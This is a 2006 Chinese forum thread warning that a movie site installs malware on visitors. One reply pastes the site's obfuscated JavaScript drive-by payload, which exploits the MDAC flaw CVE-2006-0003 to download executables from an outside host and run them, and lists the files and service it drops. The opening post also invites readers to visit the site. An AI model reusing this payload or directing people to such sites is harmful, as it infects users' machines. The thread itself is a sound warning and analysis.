DarkSkyline
2006-11-08, 09:11 AM
頂好影線(大陸網站)
http://www.bestmovie.cn/
PS:網頁一開啟後,網站馬上會植入惡意程式到你的電腦,請大家小心,順便檢測一下你們手邊的防毒軟體吧~:D
贊助商連結
http://www.bestmovie.cn/
PS:網頁一開啟後,網站馬上會植入惡意程式到你的電腦,請大家小心,順便檢測一下你們手邊的防毒軟體吧~:D
贊助商連結
|
贊助商連結 DarkSkyline 2006-11-08, 09:11 AM 頂好影線(大陸網站) http://www.bestmovie.cn/ PS:網頁一開啟後,網站馬上會植入惡意程式到你的電腦,請大家小心,順便檢測一下你們手邊的防毒軟體吧~:D 贊助商連結 KFW 2006-11-08, 09:36 AM 有嗎 ....?? 還是你 M$ 沒更新..? hycnet 2006-11-08, 09:57 AM 用AntiVir Free版會抓到TR/Crypt.NSAnti.Gen clamav沒發現..趨勢好像也沒發現...(希望趨勢加油一點!!:|||: ) 可否分享一下...這個惡意程式的特徵或該檢查哪些地方呢? ifchen 2006-11-08, 07:16 PM 呃... NOD32 沒反應... 而且McAfee SiteAdvisor 說這是個安全的網站...... XP更新後漏洞沒了, 所以沒反應吧~ 不會發生下面hcchen所說的情形~ rushoun 2006-11-08, 07:25 PM 既然是惡意網站,叫大家測試,不是很危險?:confused: hcchen 2006-11-08, 08:39 PM 網站導向了很多次,並做了很多種編碼。 最後導向: http://www.88ttg.com/j.htm 有興趣的可以還原下面的東東........ <html> <head><META HTTP-EQUIV="ImageToolbar" CONTENT="No"><META NAME="MSSmartTagsPreventParsing" CONTENT="True"><META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Pragma" CONTENT="No-Cache"><SCRIPT LANGUAGE="JavaScript">eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%72%52%72%52%72%52%72%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b"));</script> <body><SCRIPT LANGUAGE="JavaScript">RrRrRrRr("<CITLNUG=JvSrp\"wie(idwsdbr?reflevrw5=as;fnvgtrueAetidxf'pr'!-){lr(Ti e aede o upr pr rwe.) idwlcto=aotbak;fnto ri({lr(H.) eunfle}fnto rn(){i(.hc=2|.hc=3 eunfle i(ouetlyr){dcmn.atrEet(vn.OSDW) ouetomueonncs dcmn.notxmn=ri;ouetoslcsatnwFnto(rtr as\";ucinne({f(ouetlyr)|sd)vrqe ouetgteeto(;fqe=\" wno.id\"\"}stieu(ne(\"2)}ne(;ucindsrg)i(ouetal{ouetodasat e ucin\"eunfle)fr( ;<dcmn.mgslnt;+)z=dcmn.mgsi;.alrIg='o;};ida(;ucinwdd)wno.tts\"\"stieu(wdd),0;;wd(;ucinf6w)dcmn.oain\";46tu;eun}i(idwlcto.rtclidxf\"ie)=1{39(;fnto c({lporDt.laDt(;;ucince)cd)stieu(ce),0;;c(;fdcmn.l)ouetwie'ln e=tlsettp=tx/s\"he=epnl.s\"';/CIT<tl ei=pit>oy{ipa:oe<sye\r<il>et/il>\ncne>#63;#61;#01;./etr\r srp agae\"Bcit>\n nerrrsm et\n e b ouetcetEeet\"bet)\n ua csdB9C&566A-1093-00\"\"C9&E6\r ojsttrbt casd,fkv\n e xl=ojCetOjc(Mc\"\"sf.M\"\"TP,\"\r stS=ojcetojc(A\"\"d.t\"\"a\"\")\n .ye=1\n xlOe G\"\"\" ht:/w.8t.o/fee,Fle\n xlSn\r fae=jee\r stF=ojcetojc(Sr&itn.iey\"\"eOjc\"\")\n e m .eSeilodr2 \n nm1 .ulPt(m,nm1\r Soe\r Swiedm.epneoy\n .aeoiefae,\r Scoe\n e b.raebet\"h\"\"lApia&to\"\")\n .hlEeuefae,\"\",oe\"0\n /cit\r<ha>SRP AGAE\"aacit>sd=wno.iea)tu:as;a 46flei(aiao.srgn.neO(Oea)=1 aet\"hswbpg osntspotOeaBosr\";wno.oain\"bu:ln\"}ucinnce)aet\"i\";rtr as;;ucinncse fewih=|ewih=)rtr as;}fdcmn.aes ouetcpuevnsEetMUEON;dcmn.nosdw=rn;}ouetocneteuncedcmn.neettr=e ucin\"eunfle)fnto sl)i(dcmn.aes|wie{a w=dcmn.eSlcin)i(w!\"){idwfn( );eTmot\"sl),0;}sl)fnto ida({fdcmn.l)dcmn.nrgtr=nwFnto(rtr as\";o i=0i ouetiae.eghi+{ ouetiae()zgleym n'}}dsrg)fnto wd({idwsau= ;eTmot\"wd(\"1)}wdd)fnto 39({ouetlcto=\"w5=rertr;;fwno.oainpooo.neO(fl\"!-)f6w)}ucincd)cibadaaceraa)}fnto c({c(;eTmot\"c(\"3)}ce)i(ouetaldcmn.rt(<ikrlsyehe ye\"etcs rf\"h_ulcs>)<SRP>syemda'rn'bd dslynn}/tl>\nttets<tte\r<etr&339&376&203.<cne>\n<citlnug=VSrp\"\r o ro euenx\r Stoj=dcmn.raelmn(ojc\"\r fkv=\"li:D6\"\"5-531D-8A0C4&F2\"\"3\"\n b.eAtiue\"lsi\" ua\r Stdm b.raebet\"ir&ootXL&HT\"\")\n e b.raebet\"d&obSr&em,\"\r Stp \r dm.pn\"E&T,\"tp/ww8tgcmd.x\" as\r dm.ed\n nm1\".x\"\n e b.raebet\"c\"\"pigFlSs&tmbet,\"\r sttp=FGtpcaFle()\r fae=FBidahtpfae)\n .pn\n .rt xlrsosBd\r Ssvtfl nm12\n .ls\r stQ=ojcetojc(Se&l.plc\"\"in,\"\r QSelxct nm1\",\"\"pn,\r <srp>\n/ed\r\n");</SCRIPT></body> </html> 一樣是: Microsoft Windows MDAC 漏洞 - CVE-2006-0003: 作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的 RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏 洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬 下載檔案: 1.exe 2.exe 3.exe df.exe C:\Documents and Settings\{user}\Local Settings\Temp下產生 j.exe 自動執行後會出現 j1.exe 和 j2.exe發生問題xxxxxxxxxxx C:\windows下產生 winntKey.dll 32KB winnt.Dll 258KB winnt.exe C:\windows\system32下產生 WSD_SOCK32.DLL 複製和貼上功能失效 增加一個服務 O23 - Service: PigeonServer - Unknown owner - C:\WINDOWS\winnt.exe (file missing) fq4lxx92 2006-11-08, 11:26 PM 龜毛究竟是好還是壞? 前幾次用VBScript,這次已經用JavaScript,照理說非IE的瀏覽器應該會有反應。結果因為它的JavaScript不是用標準語法,火狐就停在那裡,什麼事也沒發生。 |
|
|